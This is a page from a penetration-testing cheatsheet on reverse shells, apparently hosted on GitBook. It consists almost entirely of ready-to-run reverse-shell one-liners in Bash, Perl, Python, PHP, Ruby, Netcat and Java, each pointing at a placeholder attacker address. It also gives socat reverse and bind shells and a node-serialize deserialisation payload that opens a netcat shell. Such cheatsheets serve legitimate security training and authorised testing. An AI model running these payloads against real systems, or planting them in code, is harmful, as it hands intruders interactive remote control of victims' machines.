✒️
Pentesting Cheatsheet
  • Introduction
  • Basics
  • Information Gathering | OSINT
  • Penetration Testing
    • Scanning and Enumeration
    • HTTP and HTTPS
    • SMB | Windows Domain Enumeration
    • NFS
    • SMTP
    • Reverse Shells
    • Buffer Overflow | Buf Exploitation
    • Linux Privilege Escalation
    • Miscellaneous
    • Redis
  • Active Directory
    • AD Extras
    • Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
  • Pivoting
  • Windows Privesc
    • Window Tools/Resources
    • Meterpreter Privesc
    • Powershell Scripting
  • Vulnhub/ PG/ THM/ HTB
  • Apache Log4j
  • Linux Forensics Cheatsheet
Powered by GitBook
On this page
  • UPGRADING SHELLS
  • Socat Reverse shell
  • Bind shell

Was this helpful?

  1. Penetration Testing

Reverse Shells

PreviousSMTPNextBuffer Overflow | Buf Exploitation

Last updated 2 years ago

Was this helpful?

Bash

Some versions of (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Here’s a shorter, feature-free version of the :

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There’s also an .

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust .

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

UPGRADING SHELLS

Socat Reverse shell

It can send back a reverse shell to a listening attacker to open a remote network access.

  • Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.

    RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

Bind shell

It can bind a shell to a local port to allow remote network access.

  • Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.

    LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane

Node.js Reverse Shell using "node-serialize" (Insecure Deserialisation)

{"email":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.30.151 4444 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) });\n }()"}

If you have the wrong version of netcat installed, that you might still be able to get your reverse shell back like this:

bash can send you a reverse shell
perl-reverse-shell
alternative PERL revere shell here
php-reverse-shell
Jeff Price points out here
Online - Reverse Shell Generator
Logo
Upgrading Simple Shells to Fully Interactive TTYsropnop blog
netcat, ncat & sbd – NeilSec: Security Learning Blog
Logo
sbd | Kali Linux ToolsKali Linux
SBD for SSL Encryption
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetpentestmonkey.net
Logo
Logo